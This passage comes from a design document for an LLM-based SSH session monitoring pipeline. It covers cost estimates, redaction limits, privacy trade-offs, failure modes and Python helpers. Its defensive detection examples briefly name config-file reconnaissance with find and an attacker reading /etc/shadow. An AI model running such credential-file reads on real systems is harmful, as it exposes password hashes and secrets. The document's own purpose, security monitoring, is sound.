| Token cost per session | A 20-minute session transcript at 500-char output truncation is approximately 2,000–4,000 input tokens (MAX_TRANSCRIPT_CHARS caps the transcript at 12,000 characters). At Claude Sonnet pricing (~$3/million input tokens), that is $0.006–$0.012 per session for the transcript alone; the system prompt and the model’s JSON output are billed on top. A fleet handling 1,000 SSH sessions/day incurs ~$6–$12/day in transcript input costs. | Cost scales linearly with session volume. Evaluate against SIEM analyst hourly rates. Pre-filter benign sessions (known-good service accounts, CI/CD automation) before LLM submission to reduce volume by 60–80%. |
| False positive rate vs. rule-based detection | LLMs produce more false positives on ambiguous sessions than well-tuned SIEM rules. An LLM may flag a database administrator running find / -name "*.cnf" as reconnaissance. A tuned rule would not. | Tune recommended_action routing to add friction before paging: MEDIUM findings go to GitHub issues only; only CRITICAL findings page on-call. Analyst review of GitHub issues is lower-urgency than a 3am PagerDuty page. |
| External LLM API (data privacy) | Sending session transcripts to Anthropic or OpenAI means command sequences and output snippets leave your perimeter. Even with redaction, an attacker’s lateral movement reveals internal network topology. | For environments with strict data residency requirements, deploy a local model (Mistral, LLaMA, CodeLlama) via vLLM or Ollama. Local models have lower accuracy on novel attack patterns and require GPU infrastructure. Evaluate against compliance requirements. |
| Redaction completeness | The regex-based redaction in this pipeline catches common patterns. It will not catch all secret formats — a custom API token format, an internal JWT structure, or a proprietary credential format may pass through unredacted. | Audit redaction patterns against your actual credential formats before deploying to production. Consider a second-pass DLP scan (AWS Macie, Google Cloud DLP) on the pre-LLM transcript before submission. |
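
The token-cost row reduces to simple arithmetic, sketched below so that you can plug in your own volumes. The $3 per million input tokens figure and the 60% pre-filter rate are the approximate numbers quoted in the table, not current price quotes, and `daily_input_cost` is an illustrative helper that covers transcript input tokens only.

```python
def daily_input_cost(
    sessions_per_day: int,
    tokens_per_session: int,
    usd_per_million_tokens: float = 3.0,
    prefilter_fraction: float = 0.0,
) -> float:
    """Estimated daily spend on transcript input tokens, in USD.

    prefilter_fraction is the share of sessions skipped before LLM submission.
    """
    analysed_sessions = sessions_per_day * (1.0 - prefilter_fraction)
    return analysed_sessions * tokens_per_session * usd_per_million_tokens / 1_000_000


low = daily_input_cost(1_000, 2_000)
high = daily_input_cost(1_000, 4_000)
filtered = daily_input_cost(1_000, 4_000, prefilter_fraction=0.6)

print(f"${low:.2f} to ${high:.2f} per day; ${filtered:.2f} with 60% pre-filtered")
# $6.00 to $12.00 per day; $4.80 with 60% pre-filtered
```

Output tokens and the system prompt add to these figures, so treat the result as a lower bound.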
Failure Modes
| Failure | Trigger | Impact | Mitigation |
|---|---|---|---|
| LLM API unavailable | Anthropic/OpenAI service outage, network partition, rate limit exceeded | No LLM analysis for sessions that end during the outage window. These sessions are not re-analysed afterwards by default. | The pipeline falls back to a low/monitor stub finding, which route_alerts does not escalate, so no alert is sent; the audit log itself remains in S3. Implement a retry queue (SQS, Redis) that re-submits sessions for analysis when the API recovers. Alert on LLM API error rate. |
| Session transcript too long | A 4-hour maintenance session, a session with extremely verbose command output, or an attacker running a large compilation | The hard cap at MAX_TRANSCRIPT_CHARS truncates the transcript. Commands at the end of the session, potentially including persistence mechanisms installed before the attacker exited, are lost. | Increase MAX_TRANSCRIPT_CHARS cautiously (cost increases). Implement a sliding-window strategy: analyse the first 6,000 and last 6,000 chars separately, then aggregate findings. Flag truncated sessions explicitly in the incident ticket. |
| Secrets inadvertently sent to LLM API | A novel credential format not covered by redaction patterns; attacker pipes /etc/shadow and the hash is not matched by any redaction regex | Credential material reaches the LLM provider’s API. May be logged, stored in provider telemetry, or retained for training depending on provider data retention policies. | Audit credential formats against redaction regexes quarterly. Consider a dedicated secrets scanner (for example Truffle Security’s TruffleHog, or AWS Macie batch analysis) as a pre-send gate. Enable the LLM provider’s zero-data-retention API tier if available. |
| Structured output schema violation | The LLM returns output that does not match the expected schema: a missing required field, an invalid risk_level, or prose around the JSON that the fence-stripping step does not remove | analyse_session_with_llm raises ValueError, pipeline falls back to stub finding, session is not alerted on. Other deviations (extra fields, wrong values in fields that are not validated) pass through unchecked. | Add a pydantic model for response validation. Implement retry with an explicit correction prompt: “Your previous response had schema errors: {errors}. Please return only the valid JSON.” Cap retries at 2. |
| High false positive rate causing alert fatigue | LLM flags every sysadmin session that touches SUID binaries or network tools as HIGH, resulting in 50 GitHub issues per day | Analysts stop reviewing issues. Real incidents are buried. Detection value collapses to near zero. | Calibrate risk thresholds against two weeks of real session data before going live. Implement feedback loop: analysts mark GitHub issues as false-positive; feed these back to a few-shot prompt library that the system prompt references. Review Slack alert and PagerDuty volume weekly. |
| Audit log unavailable | S3 bucket permissions error, ContainerSSH crash before log flush, network partition during log upload | Session is not analysed at all — no finding, no alert, no incident ticket | Alert on missing audit logs for sessions observed in ContainerSSH connection metrics. A session that connected but has no corresponding audit log object after 60 seconds is itself a monitoring event worth alerting on. |
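
The mitigation for over-long transcripts can be sketched as a head-and-tail split followed by a merge of the per-window results. This is one possible reading of that row, not code from the pipeline above: `head_tail_windows`, `merge_findings`, and the `middle_omitted` flag are illustrative names, and the middle of the session is still dropped, which is why the merged result records that fact.

```python
from typing import Any

# Risk levels in ascending order, matching the schema in SYSTEM_PROMPT.
RISK_ORDER = ["benign", "low", "medium", "high", "critical"]


def head_tail_windows(transcript: str, window_chars: int = 6_000) -> list[str]:
    """Return the whole transcript if it fits in two windows, else its first and last window."""
    if len(transcript) <= 2 * window_chars:
        return [transcript]
    return [transcript[:window_chars], transcript[-window_chars:]]


def merge_findings(results: list[dict[str, Any]]) -> dict[str, Any]:
    """Keep the highest-risk window's verdict and concatenate all findings."""
    worst = max(results, key=lambda r: RISK_ORDER.index(r["risk_level"]))
    merged = dict(worst)
    merged["findings"] = [f for r in results for f in r["findings"]]
    # More than one window means part of the session was never analysed.
    merged["middle_omitted"] = len(results) > 1
    return merged


windows = head_tail_windows("A" * 7_000 + "B" * 7_000)

# Stand-ins for the per-window LLM results.
merged = merge_findings([
    {"risk_level": "low", "findings": []},
    {"risk_level": "high", "findings": [{"category": "persistence"}]},
])
print(len(windows), merged["risk_level"], len(merged["findings"]))  # 2 high 1
```

Analysing the tail separately matters because persistence mechanisms tend to be installed just before the attacker disconnects, which is exactly the part a simple head truncation discards.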